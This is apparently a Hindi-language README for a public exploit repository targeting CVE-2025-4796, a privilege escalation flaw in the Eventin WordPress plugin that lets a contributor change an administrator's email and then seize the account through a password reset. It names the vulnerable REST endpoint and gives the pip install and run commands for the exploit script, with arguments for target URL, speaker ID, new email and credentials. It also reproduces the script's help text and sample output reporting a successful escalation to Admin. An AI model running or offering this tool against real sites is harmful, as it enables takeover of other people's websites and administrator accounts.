
Eventin <= 4.0.34 - प्रमाणित (योगदानकर्ता+) उपयोगकर्ता ईमेल परिवर्तन/खाता अधिग्रहण के माध्यम से विशेषाधिकार वृद्धि
Eventin <= 4.0.34 - उपयोगकर्ता ईमेल परिवर्तन/खाता अधिग्रहण के माध्यम से प्रमाणित (Contributor+) विशेषाधिकार वृद्धि
यह रिपॉजिटरी Eventin WordPress प्लगइन (<= 4.0.34) में एक विशेषाधिकार वृद्धि भेद्यता का दस्तावेजीकरण करती है, जो Contributor+ क्षमताओं वाले प्रमाणित उपयोगकर्ता को प्लगइन के स्पीकर अपडेट API के माध्यम से किसी भी उपयोगकर्ता के ईमेल पते बदलने की अनुमति देती है। किसी व्यवस्थापक का ईमेल बदलकर, एक हमलावर पासवर्ड रीसेट ट्रिगर कर सकता है और खाता अधिग्रहण प्राप्त कर सकता है।
संवेदनशील घटक: Eventin WordPress प्लगइन (Eventin\Speaker\Api\SpeakerController::update_item)
प्रभावित संस्करण: <= 4.0.34
CVE: CVE-2025-4796
CVSS: 8.8 (उच्च)
सक्रिय इंस्टॉलेशन: 10,000+
Eventin स्पीकर/उपयोगकर्ता विवरण (विशेष रूप से ईमेल) अपडेट करने से पहले कॉलर की पहचान या क्षमता को ठीक से सत्यापित नहीं करता है। एक हमलावर जो contributor (या उच्चतर) के रूप में प्रमाणित है, प्लगइन के REST एंडपॉइंट का उपयोग करके अन्य उपयोगकर्ताओं — जिनमें व्यवस्थापक भी शामिल हैं — का ईमेल पता बदल सकता है:
एक बार ईमेल को हमलावर-नियंत्रित पते पर बदल दिए जाने के बाद, खाते पर कब्जा करने के लिए मानक WordPress पासवर्ड रीसेट प्रक्रिया का उपयोग किया जा सकता है।
फ़ाइल नाम: CVE-2025-4796.py
यह स्क्रिप्ट निम्नलिखित चरणों को स्वचालित करती है:
/wp-json/eventin/v2/speakers/<speaker_id> पर एक PUT अनुरोध भेजें।आवश्यकताएँ:
स्थापना:
pip install requests
स्क्रिप्ट को कमांड लाइन से चलाएँ:
python CVE-2025-4796.py -u https://target.site -id 9 -email [email protected] -user contributor_user -pass contributor_password
स्क्रिप्ट सहायता दिखाएँ:
python CVE-2025-4796.py -h
usage: CVE-2025-4796.py [-h] -u URL -id SPEAKER_ID -email EMAIL -user USERNAME -pass PASSWORD
Exploit For: CVE-2025-4796 By: Nxploited
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL
-id, --speaker_id SPEAKER_ID
Enter the speaker ID for the user
-email, --email EMAIL
Enter a new email address
-user, --username USERNAME
Enter the username for the account to upgrade
-pass, --password PASSWORD
Enter the password for the account to upgrade
[*] Please wait, exploitation starting ...
[*] Disabling SSL warnings ...
[*] Logging in to WordPress ...
[+] Logged in successfully.
[*] Extracting nonce value ...
[+] Nonce extracted: fc0ab7b983
[*] Exploiting and updating speaker info ...
[+] Exploitation in progress, please wait ...
[+] Exploitation successful.
[+] The account has been updated to Admin.
Speaker ID : 9
Email : [email protected]
[!] Please reset your password using the email: [email protected]
द्वारा: Khaled Alenaz (Nxploited)
GitHub: https://github.com/Nxploited/